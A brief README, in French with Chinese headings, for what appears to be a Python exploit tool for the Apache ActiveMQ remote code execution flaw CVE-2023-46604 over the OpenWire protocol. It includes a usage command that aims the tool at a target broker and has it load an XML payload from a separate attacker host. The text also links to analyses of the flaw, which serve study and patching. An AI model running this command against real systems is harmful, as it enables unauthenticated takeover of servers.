
Exploit d'exécution de code à distance basé sur Python pour Apache ActiveMQ CVE-2023-46604, exploitant le protocole OpenWire pour délivrer des charges utiles XML afin d'obtenir une exécution de code à distance non authentifiée.
Ce projet est une réécriture en python de l'exp du projet https://github.com/X1r0z/ActiveMQ-RCE .
python attack.py -u 192.168.163.129 -x http://192.168.163.133:10001/poc.xml -p 61616
Le paramètre -p est par défaut le port par défaut d'activeMQ. Le paramètre -x nécessite d'ajouter le préfixe du protocole.
Voici le diagramme du protocole openwire pour clarifier.
Ci-dessous est donné le format du paquet de type Throwable.

L'analyse détaillée de la vulnérabilité se trouve dans les articles de référence ci-dessous.
# openwire协议的分析
https://github.com/X1r0z
https://activemq.apache.org/openwire-version-2-specification
# CVE漏洞原理的分析
https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/